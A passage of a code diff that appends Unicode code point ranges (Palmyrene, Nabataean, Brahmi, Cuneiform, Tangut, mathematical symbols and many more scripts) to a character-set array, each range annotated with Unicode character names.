+	while (c <= 0x1087f)	// ..to PALMYRENE NUMBER TWENTY
+		charset[i++] = c++;
+// 10880..108AF; Nabataean
+	c = 0x10880;		// from NABATAEAN LETTER FINAL ALEPH
+	while (c <= 0x1089e)	// ..to NABATAEAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x108a7;		// from NABATAEAN NUMBER ONE
+	while (c <= 0x108af)	// ..to NABATAEAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 108E0..108FF; Hatran
+	c = 0x108e0;		// from HATRAN LETTER ALEPH
+	while (c <= 0x108f2)	// ..to HATRAN LETTER QOPH
+		charset[i++] = c++;
+	charset[i++] = 0x108f4;	// HATRAN LETTER SHIN
+	charset[i++] = 0x108f5;	// HATRAN LETTER TAW
+	c = 0x108fb;		// from HATRAN NUMBER ONE
+	while (c <= 0x108ff)	// ..to HATRAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10900..1091F; Phoenician
+	c = 0x10900;		// from PHOENICIAN LETTER ALF
+	while (c <= 0x1091b)	// ..to PHOENICIAN NUMBER THREE
+		charset[i++] = c++;
+	charset[i++] = 0x1091f;	// PHOENICIAN WORD SEPARATOR
+// 10920..1093F; Lydian
+	c = 0x10920;		// from LYDIAN LETTER A
+	while (c <= 0x10939)	// ..to LYDIAN LETTER C
+		charset[i++] = c++;
+	charset[i++] = 0x1093f;	// LYDIAN TRIANGULAR MARK
+// 10980..1099F; Meroitic Hieroglyphs
+	c = 0x10980;		// from MEROITIC HIEROGLYPHIC LETTER A
+	while (c <= 0x1099f)	// ..to MEROITIC HIEROGLYPHIC SYMBOL VIDJ-2
+		charset[i++] = c++;
+// 109A0..109FF; Meroitic Cursive
+	c = 0x109a0;		// from MEROITIC CURSIVE LETTER A
+	while (c <= 0x109b7)	// ..to MEROITIC CURSIVE LETTER DA
+		charset[i++] = c++;
+	c = 0x109bc;		// from MEROITIC CURSIVE FRACTION ELEVEN TWELFTHS
+	while (c <= 0x109cf)	// ..to MEROITIC CURSIVE NUMBER SEVENTY
+		charset[i++] = c++;
+	c = 0x109d2;		// from MEROITIC CURSIVE NUMBER ONE HUNDRED
+	while (c <= 0x109ff)	// ..to MEROITIC CURSIVE FRACTION TEN TWELFTHS
+		charset[i++] = c++;
+// 10A00..10A5F; Kharoshthi
+	c = 0x10a00;		// from KHAROSHTHI LETTER A
+	while (c <= 0x10a03)	// ..to KHAROSHTHI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x10a05;	// KHAROSHTHI VOWEL SIGN E
+	charset[i++] = 0x10a06;	// KHAROSHTHI VOWEL SIGN O
+	c = 0x10a0c;		// from KHAROSHTHI VOWEL LENGTH MARK
+	while (c <= 0x10a13)	// ..to KHAROSHTHI LETTER GHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a15;	// KHAROSHTHI LETTER CA
+	charset[i++] = 0x10a17;	// KHAROSHTHI LETTER JA
+	c = 0x10a19;		// from KHAROSHTHI LETTER NYA
+	while (c <= 0x10a35)	// ..to KHAROSHTHI LETTER VHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a38;	// KHAROSHTHI SIGN BAR ABOVE
+	charset[i++] = 0x10a3a;	// KHAROSHTHI SIGN DOT BELOW
+	c = 0x10a3f;		// from KHAROSHTHI VIRAMA
+	while (c <= 0x10a48)	// ..to KHAROSHTHI FRACTION ONE HALF
+		charset[i++] = c++;
+	c = 0x10a50;		// from KHAROSHTHI PUNCTUATION DOT
+	while (c <= 0x10a58)	// ..to KHAROSHTHI PUNCTUATION LINES
+		charset[i++] = c++;
+// 10A60..10A7F; Old South Arabian
+	c = 0x10a60;		// from OLD SOUTH ARABIAN LETTER HE
+	while (c <= 0x10a7f)	// ..to OLD SOUTH ARABIAN NUMERIC INDICATOR
+		charset[i++] = c++;
+// 10A80..10A9F; Old North Arabian
+	c = 0x10a80;		// from OLD NORTH ARABIAN LETTER HEH
+	while (c <= 0x10a9f)	// ..to OLD NORTH ARABIAN NUMBER TWENTY
+		charset[i++] = c++;
+// 10AC0..10AFF; Manichaean
+	c = 0x10ac0;		// from MANICHAEAN LETTER ALEPH
+	while (c <= 0x10ae6)	// ..to MANICHAEAN ABBREVIATION MARK BELOW
+		charset[i++] = c++;
+	c = 0x10aeb;		// from MANICHAEAN NUMBER ONE
+	while (c <= 0x10af6)	// ..to MANICHAEAN PUNCTUATION LINE FILLER
+		charset[i++] = c++;
+// 10B00..10B3F; Avestan
+	c = 0x10b00;		// from AVESTAN LETTER A
+	while (c <= 0x10b35)	// ..to AVESTAN LETTER HE
+		charset[i++] = c++;
+	c = 0x10b39;		// from AVESTAN ABBREVIATION MARK
+	while (c <= 0x10b3f)	// ..to LARGE ONE RING OVER TWO RINGS PUNCTUATION
+		charset[i++] = c++;
+// 10B40..10B5F; Inscriptional Parthian
+	c = 0x10b40;		// from INSCRIPTIONAL PARTHIAN LETTER ALEPH
+	while (c <= 0x10b55)	// ..to INSCRIPTIONAL PARTHIAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b58;		// from INSCRIPTIONAL PARTHIAN NUMBER ONE
+	while (c <= 0x10b5f)	// ..to INSCRIPTIONAL PARTHIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B60..10B7F; Inscriptional Pahlavi
+	c = 0x10b60;		// from INSCRIPTIONAL PAHLAVI LETTER ALEPH
+	while (c <= 0x10b72)	// ..to INSCRIPTIONAL PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b78;		// from INSCRIPTIONAL PAHLAVI NUMBER ONE
+	while (c <= 0x10b7f)	// ..to INSCRIPTIONAL PAHLAVI NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B80..10BAF; Psalter Pahlavi
+	c = 0x10b80;		// from PSALTER PAHLAVI LETTER ALEPH
+	while (c <= 0x10b91)	// ..to PSALTER PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b99;		// from PSALTER PAHLAVI SECTION MARK
+	while (c <= 0x10b9c)	// ..to PSALTER PAHLAVI FOUR DOTS WITH DOT
+		charset[i++] = c++;
+	c = 0x10ba9;		// from PSALTER PAHLAVI NUMBER ONE
+	while (c <= 0x10baf)	// ..to PSALTER PAHLAVI NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10C00..10C4F; Old Turkic
+	c = 0x10c00;		// from OLD TURKIC LETTER ORKHON A
+	while (c <= 0x10c48)	// ..to OLD TURKIC LETTER ORKHON BASH
+		charset[i++] = c++;
+// 10C80..10CFF; Old Hungarian
+	c = 0x10c80;		// from OLD HUNGARIAN CAPITAL LETTER A
+	while (c <= 0x10cb2)	// ..to OLD HUNGARIAN CAPITAL LETTER US
+		charset[i++] = c++;
+	c = 0x10cc0;		// from OLD HUNGARIAN SMALL LETTER A
+	while (c <= 0x10cf2)	// ..to OLD HUNGARIAN SMALL LETTER US
+		charset[i++] = c++;
+	c = 0x10cfa;		// from OLD HUNGARIAN NUMBER ONE
+	while (c <= 0x10cff)	// ..to OLD HUNGARIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10D00..10D3F; Hanifi Rohingya
+	c = 0x10d00;		// from HANIFI ROHINGYA LETTER A
+	while (c <= 0x10d27)	// ..to HANIFI ROHINGYA SIGN TASSI
+		charset[i++] = c++;
+	c = 0x10d30;		// from HANIFI ROHINGYA DIGIT ZERO
+	while (c <= 0x10d39)	// ..to HANIFI ROHINGYA DIGIT NINE
+		charset[i++] = c++;
+// 10E60..10E7F; Rumi Numeral Symbols
+	c = 0x10e60;		// from RUMI DIGIT ONE
+	while (c <= 0x10e7e)	// ..to RUMI FRACTION TWO THIRDS
+		charset[i++] = c++;
+// 10F00..10F2F; Old Sogdian
+	c = 0x10f00;		// from OLD SOGDIAN LETTER ALEPH
+	while (c <= 0x10f27)	// ..to OLD SOGDIAN LIGATURE AYIN-DALETH
+		charset[i++] = c++;
+// 10F30..10F6F; Sogdian
+	c = 0x10f30;		// from SOGDIAN LETTER ALEPH
+	while (c <= 0x10f59)	// ..to SOGDIAN PUNCTUATION HALF CIRCLE WITH DOT
+		charset[i++] = c++;
+// 11000..1107F; Brahmi
+	c = 0x11000;		// from BRAHMI SIGN CANDRABINDU
+	while (c <= 0x1104d)	// ..to BRAHMI PUNCTUATION LOTUS
+		charset[i++] = c++;
+	c = 0x11052;		// from BRAHMI NUMBER ONE
+	while (c <= 0x1106f)	// ..to BRAHMI DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1107f;	// BRAHMI NUMBER JOINER
+// 11080..110CF; Kaithi
+	c = 0x11080;		// from KAITHI SIGN CANDRABINDU
+	while (c <= 0x110c1)	// ..to KAITHI DOUBLE DANDA
+		charset[i++] = c++;
+	charset[i++] = 0x110cd;	// KAITHI NUMBER SIGN ABOVE
+// 110D0..110FF; Sora Sompeng
+	c = 0x110d0;		// from SORA SOMPENG LETTER SAH
+	while (c <= 0x110e8)	// ..to SORA SOMPENG LETTER MAE
+		charset[i++] = c++;
+	c = 0x110f0;		// from SORA SOMPENG DIGIT ZERO
+	while (c <= 0x110f9)	// ..to SORA SOMPENG DIGIT NINE
+		charset[i++] = c++;
+// 11100..1114F; Chakma
+	c = 0x11100;		// from CHAKMA SIGN CANDRABINDU
+	while (c <= 0x11134)	// ..to CHAKMA MAAYYAA
+		charset[i++] = c++;
+	c = 0x11136;		// from CHAKMA DIGIT ZERO
+	while (c <= 0x11146)	// ..to CHAKMA VOWEL SIGN EI
+		charset[i++] = c++;
+// 11150..1117F; Mahajani
+	c = 0x11150;		// from MAHAJANI LETTER A
+	while (c <= 0x11176)	// ..to MAHAJANI LIGATURE SHRI
+		charset[i++] = c++;
+// 11180..111DF; Sharada
+	c = 0x11180;		// from SHARADA SIGN CANDRABINDU
+	while (c <= 0x111cd)	// ..to SHARADA SUTRA MARK
+		charset[i++] = c++;
+	c = 0x111d0;		// from SHARADA DIGIT ZERO
+	while (c <= 0x111df)	// ..to SHARADA SECTION MARK-2
+		charset[i++] = c++;
+// 111E0..111FF; Sinhala Archaic Numbers
+	c = 0x111e1;		// from SINHALA ARCHAIC DIGIT ONE
+	while (c <= 0x111f4)	// ..to SINHALA ARCHAIC NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 11200..1124F; Khojki
+	c = 0x11200;		// from KHOJKI LETTER A
+	while (c <= 0x11211)	// ..to KHOJKI LETTER JJA
+		charset[i++] = c++;
+	c = 0x11213;		// from KHOJKI LETTER NYA
+	while (c <= 0x1123e)	// ..to KHOJKI SIGN SUKUN
+		charset[i++] = c++;
+// 11280..112AF; Multani
+	c = 0x11280;		// from MULTANI LETTER A
+	while (c <= 0x11286)	// ..to MULTANI LETTER GA
+		charset[i++] = c++;
+	c = 0x1128a;		// from MULTANI LETTER CA
+	while (c <= 0x1128d)	// ..to MULTANI LETTER JJA
+		charset[i++] = c++;
+	c = 0x1128f;		// from MULTANI LETTER NYA
+	while (c <= 0x1129d)	// ..to MULTANI LETTER BA
+		charset[i++] = c++;
+	c = 0x1129f;		// from MULTANI LETTER BHA
+	while (c <= 0x112a9)	// ..to MULTANI SECTION MARK
+		charset[i++] = c++;
+// 112B0..112FF; Khudawadi
+	c = 0x112b0;		// from KHUDAWADI LETTER A
+	while (c <= 0x112ea)	// ..to KHUDAWADI SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0x112f0;		// from KHUDAWADI DIGIT ZERO
+	while (c <= 0x112f9)	// ..to KHUDAWADI DIGIT NINE
+		charset[i++] = c++;
+// 11300..1137F; Grantha
+	c = 0x11300;		// from GRANTHA SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0x11303)	// ..to GRANTHA SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x11305;		// from GRANTHA LETTER A
+	while (c <= 0x1130c)	// ..to GRANTHA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x1130f;	// GRANTHA LETTER EE
+	charset[i++] = 0x11310;	// GRANTHA LETTER AI
+	c = 0x11313;		// from GRANTHA LETTER OO
+	while (c <= 0x11328)	// ..to GRANTHA LETTER NA
+		charset[i++] = c++;
+	c = 0x1132a;		// from GRANTHA LETTER PA
+	while (c <= 0x11330)	// ..to GRANTHA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0x11332;	// GRANTHA LETTER LA
+	charset[i++] = 0x11333;	// GRANTHA LETTER LLA
+	c = 0x11335;		// from GRANTHA LETTER VA
+	while (c <= 0x11339)	// ..to GRANTHA LETTER HA
+		charset[i++] = c++;
+	c = 0x1133b;		// from COMBINING BINDU BELOW
+	while (c <= 0x11344)	// ..to GRANTHA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x11347;	// GRANTHA VOWEL SIGN EE
+	charset[i++] = 0x11348;	// GRANTHA VOWEL SIGN AI
+	charset[i++] = 0x1134b;	// GRANTHA VOWEL SIGN OO
+	charset[i++] = 0x1134d;	// GRANTHA SIGN VIRAMA
+	c = 0x1135d;		// from GRANTHA SIGN PLUTA
+	while (c <= 0x11363)	// ..to GRANTHA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x11366;		// from COMBINING GRANTHA DIGIT ZERO
+	while (c <= 0x1136c)	// ..to COMBINING GRANTHA DIGIT SIX
+		charset[i++] = c++;
+	c = 0x11370;		// from COMBINING GRANTHA LETTER A
+	while (c <= 0x11374)	// ..to COMBINING GRANTHA LETTER PA
+		charset[i++] = c++;
+// 11400..1147F; Newa
+	c = 0x11400;		// from NEWA LETTER A
+	while (c <= 0x11459)	// ..to NEWA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1145d;	// NEWA INSERTION SIGN
+	charset[i++] = 0x1145e;	// NEWA SANDHI MARK
+// 11480..114DF; Tirhuta
+	c = 0x11480;		// from TIRHUTA ANJI
+	while (c <= 0x114c7)	// ..to TIRHUTA OM
+		charset[i++] = c++;
+	c = 0x114d0;		// from TIRHUTA DIGIT ZERO
+	while (c <= 0x114d9)	// ..to TIRHUTA DIGIT NINE
+		charset[i++] = c++;
+// 11580..115FF; Siddham
+	c = 0x11580;		// from SIDDHAM LETTER A
+	while (c <= 0x115b5)	// ..to SIDDHAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	c = 0x115b8;		// from SIDDHAM VOWEL SIGN E
+	while (c <= 0x115dd)	// ..to SIDDHAM VOWEL SIGN ALTERNATE UU
+		charset[i++] = c++;
+// 11600..1165F; Modi
+	c = 0x11600;		// from MODI LETTER A
+	while (c <= 0x11644)	// ..to MODI SIGN HUVA
+		charset[i++] = c++;
+	c = 0x11650;		// from MODI DIGIT ZERO
+	while (c <= 0x11659)	// ..to MODI DIGIT NINE
+		charset[i++] = c++;
+// 11660..1167F; Mongolian Supplement
+	c = 0x11660;		// from MONGOLIAN BIRGA WITH ORNAMENT
+	while (c <= 0x1166c)	// ..to MONGOLIAN TURNED SWIRL BIRGA WITH DOUBLE ORNAMENT
+		charset[i++] = c++;
+// 11680..116CF; Takri
+	c = 0x11680;		// from TAKRI LETTER A
+	while (c <= 0x116b7)	// ..to TAKRI SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x116c0;		// from TAKRI DIGIT ZERO
+	while (c <= 0x116c9)	// ..to TAKRI DIGIT NINE
+		charset[i++] = c++;
+// 11700..1173F; Ahom
+	c = 0x11700;		// from AHOM LETTER KA
+	while (c <= 0x1171a)	// ..to AHOM LETTER ALTERNATE BA
+		charset[i++] = c++;
+	c = 0x1171d;		// from AHOM CONSONANT SIGN MEDIAL LA
+	while (c <= 0x1172b)	// ..to AHOM SIGN KILLER
+		charset[i++] = c++;
+	c = 0x11730;		// from AHOM DIGIT ZERO
+	while (c <= 0x1173f)	// ..to AHOM SYMBOL VI
+		charset[i++] = c++;
+// 11800..1184F; Dogra
+	c = 0x11800;		// from DOGRA LETTER A
+	while (c <= 0x1183b)	// ..to DOGRA ABBREVIATION SIGN
+		charset[i++] = c++;
+// 118A0..118FF; Warang Citi
+	c = 0x118a0;		// from WARANG CITI CAPITAL LETTER NGAA
+	while (c <= 0x118f2)	// ..to WARANG CITI NUMBER NINETY
+		charset[i++] = c++;
+	charset[i++] = 0x118ff;	// WARANG CITI OM
+// 11A00..11A4F; Zanabazar Square
+	c = 0x11a00;		// from ZANABAZAR SQUARE LETTER A
+	while (c <= 0x11a47)	// ..to ZANABAZAR SQUARE SUBJOINER
+		charset[i++] = c++;
+// 11A50..11AAF; Soyombo
+	c = 0x11a50;		// from SOYOMBO LETTER A
+	while (c <= 0x11a83)	// ..to SOYOMBO LETTER KSSA
+		charset[i++] = c++;
+	c = 0x11a86;		// from SOYOMBO CLUSTER-INITIAL LETTER RA
+	while (c <= 0x11aa2)	// ..to SOYOMBO TERMINAL MARK-2
+		charset[i++] = c++;
+// 11AC0..11AFF; Pau Cin Hau
+	c = 0x11ac0;		// from PAU CIN HAU LETTER PA
+	while (c <= 0x11af8)	// ..to PAU CIN HAU GLOTTAL STOP FINAL
+		charset[i++] = c++;
+// 11C00..11C6F; Bhaiksuki
+	c = 0x11c00;		// from BHAIKSUKI LETTER A
+	while (c <= 0x11c08)	// ..to BHAIKSUKI LETTER VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c0a;		// from BHAIKSUKI LETTER E
+	while (c <= 0x11c36)	// ..to BHAIKSUKI VOWEL SIGN VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c38;		// from BHAIKSUKI VOWEL SIGN E
+	while (c <= 0x11c45)	// ..to BHAIKSUKI GAP FILLER-2
+		charset[i++] = c++;
+	c = 0x11c50;		// from BHAIKSUKI DIGIT ZERO
+	while (c <= 0x11c6c)	// ..to BHAIKSUKI HUNDREDS UNIT MARK
+		charset[i++] = c++;
+// 11C70..11CBF; Marchen
+	c = 0x11c70;		// from MARCHEN HEAD MARK
+	while (c <= 0x11c8f)	// ..to MARCHEN LETTER A
+		charset[i++] = c++;
+	c = 0x11c92;		// from MARCHEN SUBJOINED LETTER KA
+	while (c <= 0x11ca7)	// ..to MARCHEN SUBJOINED LETTER ZA
+		charset[i++] = c++;
+	c = 0x11ca9;		// from MARCHEN SUBJOINED LETTER YA
+	while (c <= 0x11cb6)	// ..to MARCHEN SIGN CANDRABINDU
+		charset[i++] = c++;
+// 11D00..11D5F; Masaram Gondi
+	c = 0x11d00;		// from MASARAM GONDI LETTER A
+	while (c <= 0x11d06)	// ..to MASARAM GONDI LETTER E
+		charset[i++] = c++;
+	charset[i++] = 0x11d08;	// MASARAM GONDI LETTER AI
+	charset[i++] = 0x11d09;	// MASARAM GONDI LETTER O
+	c = 0x11d0b;		// from MASARAM GONDI LETTER AU
+	while (c <= 0x11d36)	// ..to MASARAM GONDI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x11d3c;	// MASARAM GONDI VOWEL SIGN AI
+	charset[i++] = 0x11d3d;	// MASARAM GONDI VOWEL SIGN O
+	c = 0x11d3f;		// from MASARAM GONDI VOWEL SIGN AU
+	while (c <= 0x11d47)	// ..to MASARAM GONDI RA-KARA
+		charset[i++] = c++;
+	c = 0x11d50;		// from MASARAM GONDI DIGIT ZERO
+	while (c <= 0x11d59)	// ..to MASARAM GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11D60..11DAF; Gunjala Gondi
+	c = 0x11d60;		// from GUNJALA GONDI LETTER A
+	while (c <= 0x11d65)	// ..to GUNJALA GONDI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d67;	// GUNJALA GONDI LETTER EE
+	charset[i++] = 0x11d68;	// GUNJALA GONDI LETTER AI
+	c = 0x11d6a;		// from GUNJALA GONDI LETTER OO
+	while (c <= 0x11d8e)	// ..to GUNJALA GONDI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d90;	// GUNJALA GONDI VOWEL SIGN EE
+	charset[i++] = 0x11d91;	// GUNJALA GONDI VOWEL SIGN AI
+	c = 0x11d93;		// from GUNJALA GONDI VOWEL SIGN OO
+	while (c <= 0x11d98)	// ..to GUNJALA GONDI OM
+		charset[i++] = c++;
+	c = 0x11da0;		// from GUNJALA GONDI DIGIT ZERO
+	while (c <= 0x11da9)	// ..to GUNJALA GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11EE0..11EFF; Makasar
+	c = 0x11ee0;		// from MAKASAR LETTER KA
+	while (c <= 0x11ef8)	// ..to MAKASAR END OF SECTION
+		charset[i++] = c++;
+// 12000..123FF; Cuneiform
+	c = 0x12000;		// from CUNEIFORM SIGN A
+	while (c <= 0x12399)	// ..to CUNEIFORM SIGN U U
+		charset[i++] = c++;
+// 12400..1247F; Cuneiform Numbers and Punctuation
+	c = 0x12400;		// from CUNEIFORM NUMERIC SIGN TWO ASH
+	while (c <= 0x1246e)	// ..to CUNEIFORM NUMERIC SIGN NINE U VARIANT FORM
+		charset[i++] = c++;
+	c = 0x12470;		// from CUNEIFORM PUNCTUATION SIGN OLD ASSYRIAN WORD DIVIDER
+	while (c <= 0x12474)	// ..to CUNEIFORM PUNCTUATION SIGN DIAGONAL QUADCOLON
+		charset[i++] = c++;
+// 12480..1254F; Early Dynastic Cuneiform
+	c = 0x12480;		// from CUNEIFORM SIGN AB TIMES NUN TENU
+	while (c <= 0x12543)	// ..to CUNEIFORM SIGN ZU5 TIMES THREE DISH TENU
+		charset[i++] = c++;
+// 13000..1342F; Egyptian Hieroglyphs
+	c = 0x13000;		// from EGYPTIAN HIEROGLYPH A001
+	while (c <= 0x1342e)	// ..to EGYPTIAN HIEROGLYPH AA032
+		charset[i++] = c++;
+// 14400..1467F; Anatolian Hieroglyphs
+	c = 0x14400;		// from ANATOLIAN HIEROGLYPH A001
+	while (c <= 0x14646)	// ..to ANATOLIAN HIEROGLYPH A530
+		charset[i++] = c++;
+// 16800..16A3F; Bamum Supplement
+	c = 0x16800;		// from BAMUM LETTER PHASE-A NGKUE MFON
+	while (c <= 0x16a38)	// ..to BAMUM LETTER PHASE-F VUEQ
+		charset[i++] = c++;
+// 16A40..16A6F; Mro
+	c = 0x16a40;		// from MRO LETTER TA
+	while (c <= 0x16a5e)	// ..to MRO LETTER TEK
+		charset[i++] = c++;
+	c = 0x16a60;		// from MRO DIGIT ZERO
+	while (c <= 0x16a69)	// ..to MRO DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x16a6e;	// MRO DANDA
+	charset[i++] = 0x16a6f;	// MRO DOUBLE DANDA
+// 16AD0..16AFF; Bassa Vah
+	c = 0x16ad0;		// from BASSA VAH LETTER ENNI
+	while (c <= 0x16aed)	// ..to BASSA VAH LETTER I
+		charset[i++] = c++;
+	c = 0x16af0;		// from BASSA VAH COMBINING HIGH TONE
+	while (c <= 0x16af5)	// ..to BASSA VAH FULL STOP
+		charset[i++] = c++;
+// 16B00..16B8F; Pahawh Hmong
+	c = 0x16b00;		// from PAHAWH HMONG VOWEL KEEB
+	while (c <= 0x16b45)	// ..to PAHAWH HMONG SIGN CIM TSOV ROG
+		charset[i++] = c++;
+	c = 0x16b50;		// from PAHAWH HMONG DIGIT ZERO
+	while (c <= 0x16b59)	// ..to PAHAWH HMONG DIGIT NINE
+		charset[i++] = c++;
+	c = 0x16b5b;		// from PAHAWH HMONG NUMBER TENS
+	while (c <= 0x16b61)	// ..to PAHAWH HMONG NUMBER TRILLIONS
+		charset[i++] = c++;
+	c = 0x16b63;		// from PAHAWH HMONG SIGN VOS LUB
+	while (c <= 0x16b77)	// ..to PAHAWH HMONG SIGN CIM NRES TOS
+		charset[i++] = c++;
+	c = 0x16b7d;		// from PAHAWH HMONG CLAN SIGN TSHEEJ
+	while (c <= 0x16b8f)	// ..to PAHAWH HMONG CLAN SIGN VWJ
+		charset[i++] = c++;
+// 16E40..16E9F; Medefaidrin
+	c = 0x16e40;		// from MEDEFAIDRIN CAPITAL LETTER M
+	while (c <= 0x16e9a)	// ..to MEDEFAIDRIN EXCLAMATION OH
+		charset[i++] = c++;
+// 16F00..16F9F; Miao
+	c = 0x16f00;		// from MIAO LETTER PA
+	while (c <= 0x16f44)	// ..to MIAO LETTER HHA
+		charset[i++] = c++;
+	c = 0x16f50;		// from MIAO LETTER NASALIZATION
+	while (c <= 0x16f7e)	// ..to MIAO VOWEL SIGN NG
+		charset[i++] = c++;
+	c = 0x16f8f;		// from MIAO TONE RIGHT
+	while (c <= 0x16f9f)	// ..to MIAO LETTER REFORMED TONE-8
+		charset[i++] = c++;
+// 16FE0..16FFF; Ideographic Symbols and Punctuation
+	charset[i++] = 0x16fe0;	// TANGUT ITERATION MARK
+	charset[i++] = 0x16fe1;	// NUSHU ITERATION MARK
+// 17000..187FF; Tangut
+	c = 0x17000;		// from <Tangut Ideograph, First>
+	while (c <= 0x187f1)	// ..to <Tangut Ideograph, Last>
+		charset[i++] = c++;
+// 18800..18AFF; Tangut Components
+	c = 0x18800;		// from TANGUT COMPONENT-001
+	while (c <= 0x18af2)	// ..to TANGUT COMPONENT-755
+		charset[i++] = c++;
+// 1B000..1B0FF; Kana Supplement
+	c = 0x1b000;		// from KATAKANA LETTER ARCHAIC E
+	while (c <= 0x1b0ff)	// ..to HENTAIGANA LETTER RE-2
+		charset[i++] = c++;
+// 1B100..1B12F; Kana Extended-A
+	c = 0x1b100;		// from HENTAIGANA LETTER RE-3
+	while (c <= 0x1b11e)	// ..to HENTAIGANA LETTER N-MU-MO-2
+		charset[i++] = c++;
+// 1B170..1B2FF; Nushu
+	c = 0x1b170;		// from NUSHU CHARACTER-1B170
+	while (c <= 0x1b2fb)	// ..to NUSHU CHARACTER-1B2FB
+		charset[i++] = c++;
+// 1BC00..1BC9F; Duployan
+	c = 0x1bc00;		// from DUPLOYAN LETTER H
+	while (c <= 0x1bc6a)	// ..to DUPLOYAN LETTER VOCALIC M
+		charset[i++] = c++;
+	c = 0x1bc70;		// from DUPLOYAN AFFIX LEFT HORIZONTAL SECANT
+	while (c <= 0x1bc7c)	// ..to DUPLOYAN AFFIX ATTACHED TANGENT HOOK
+		charset[i++] = c++;
+	c = 0x1bc80;		// from DUPLOYAN AFFIX HIGH ACUTE
+	while (c <= 0x1bc88)	// ..to DUPLOYAN AFFIX HIGH VERTICAL
+		charset[i++] = c++;
+	c = 0x1bc90;		// from DUPLOYAN AFFIX LOW ACUTE
+	while (c <= 0x1bc99)	// ..to DUPLOYAN AFFIX LOW ARROW
+		charset[i++] = c++;
+	c = 0x1bc9c;		// from DUPLOYAN SIGN O WITH CROSS
+	while (c <= 0x1bc9f)	// ..to DUPLOYAN PUNCTUATION CHINOOK FULL STOP
+		charset[i++] = c++;
+// 1BCA0..1BCAF; Shorthand Format Controls
+	c = 0x1bca0;		// from SHORTHAND FORMAT LETTER OVERLAP
+	while (c <= 0x1bca3)	// ..to SHORTHAND FORMAT UP STEP
+		charset[i++] = c++;
+// 1D000..1D0FF; Byzantine Musical Symbols
+	c = 0x1d000;		// from BYZANTINE MUSICAL SYMBOL PSILI
+	while (c <= 0x1d0f5)	// ..to BYZANTINE MUSICAL SYMBOL GORGON NEO KATO
+		charset[i++] = c++;
+// 1D100..1D1FF; Musical Symbols
+	c = 0x1d100;		// from MUSICAL SYMBOL SINGLE BARLINE
+	while (c <= 0x1d126)	// ..to MUSICAL SYMBOL DRUM CLEF-2
+		charset[i++] = c++;
+	c = 0x1d129;		// from MUSICAL SYMBOL MULTIPLE MEASURE REST
+	while (c <= 0x1d1e8)	// ..to MUSICAL SYMBOL KIEVAN FLAT SIGN
+		charset[i++] = c++;
+// 1D200..1D24F; Ancient Greek Musical Notation
+	c = 0x1d200;		// from GREEK VOCAL NOTATION SYMBOL-1
+	while (c <= 0x1d245)	// ..to GREEK MUSICAL LEIMMA
+		charset[i++] = c++;
+// 1D2E0..1D2FF; Mayan Numerals
+	c = 0x1d2e0;		// from MAYAN NUMERAL ZERO
+	while (c <= 0x1d2f3)	// ..to MAYAN NUMERAL NINETEEN
+		charset[i++] = c++;
+// 1D300..1D35F; Tai Xuan Jing Symbols
+	c = 0x1d300;		// from MONOGRAM FOR EARTH
+	while (c <= 0x1d356)	// ..to TETRAGRAM FOR FOSTERING
+		charset[i++] = c++;
+// 1D360..1D37F; Counting Rod Numerals
+	c = 0x1d360;		// from COUNTING ROD UNIT DIGIT ONE
+	while (c <= 0x1d378)	// ..to TALLY MARK FIVE
+		charset[i++] = c++;
+// 1D400..1D7FF; Mathematical Alphanumeric Symbols
+	c = 0x1d400;		// from MATHEMATICAL BOLD CAPITAL A
+	while (c <= 0x1d454)	// ..to MATHEMATICAL ITALIC SMALL G
+		charset[i++] = c++;
+	c = 0x1d456;		// from MATHEMATICAL ITALIC SMALL I
+	while (c <= 0x1d49c)	// ..to MATHEMATICAL SCRIPT CAPITAL A
+		charset[i++] = c++;
+	charset[i++] = 0x1d49e;	// MATHEMATICAL SCRIPT CAPITAL C
+	charset[i++] = 0x1d49f;	// MATHEMATICAL SCRIPT CAPITAL D
+	charset[i++] = 0x1d4a5;	// MATHEMATICAL SCRIPT CAPITAL J
+	charset[i++] = 0x1d4a6;	// MATHEMATICAL SCRIPT CAPITAL K
+	c = 0x1d4a9;		// from MATHEMATICAL SCRIPT CAPITAL N
+	while (c <= 0x1d4ac)	// ..to MATHEMATICAL SCRIPT CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d4ae;		// from MATHEMATICAL SCRIPT CAPITAL S
+	while (c <= 0x1d4b9)	// ..to MATHEMATICAL SCRIPT SMALL D
+		charset[i++] = c++;
+	c = 0x1d4bd;		// from MATHEMATICAL SCRIPT SMALL H
+	while (c <= 0x1d4c3)	// ..to MATHEMATICAL SCRIPT SMALL N
+		charset[i++] = c++;
+	c = 0x1d4c5;		// from MATHEMATICAL SCRIPT SMALL P
